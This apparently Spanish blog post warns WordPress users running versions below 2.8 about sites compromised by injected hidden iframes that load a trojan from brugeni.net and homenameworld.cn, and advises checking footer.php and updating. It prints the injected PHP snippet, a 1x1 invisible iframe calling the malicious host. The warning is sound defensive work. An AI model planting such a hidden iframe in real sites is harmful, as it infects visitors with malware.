Ya lo decia yo hace un par de dias, no debemos apresurarnos a actualizar nuestra versión de WordPress, nosotros no somos testers ni mucho menos expertos en seguridad, habia comentado sobre algunos problemas que habian surgido en la nueva versión, pero sin lugar a dudas este es el más peligroso conocido hasta el momento, por desgracia las versiones afectadas son las inferiores a la 2.8 de WordPress, así que potencialmente la gran mayoria de usuarios están en peligro.

El problema, que parece ser un fallo de las versiones desactualizadas de WordPress, ha hecho que varios sitios se vean afectados por este problema. Basicamente esta vulnerabilidad lo que permite es que personas malintencionadas puedan inyectar código HTML, más específicamente un iframe, donde vendría el troyano, las webs invocadas desde el iframe son: brugeni.net y homenameworld.cn.

McAfee Site Advisor ha puesto la actualización rápidamente de algunos blogs hispanos que se han visto afectados con el problema.

Desde MarlexSystems nos hacen una muy buena recomendación, es revisar nuestro sitio web en McAfee Site Advisor (Ver el informe de un sitio) o revisar el  código fuente en la función get_footer() que se encuentra en el archivo footer.php de tu theme WordPress.

El código que pueden encontrar es algo más o menos así:

<?php get_footer();
echo “<iframe src=\”http://brugeni.net/?click=8D7810\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
?>

Esto me pone en tela de juicio, porque ahora es más que necesario hacer una actualización de nuestro WordPress, la seguridad en la mayoria de los casos prima sobre otros problemas, así que no lo piensen dos veces.

Leer Más: Galachadas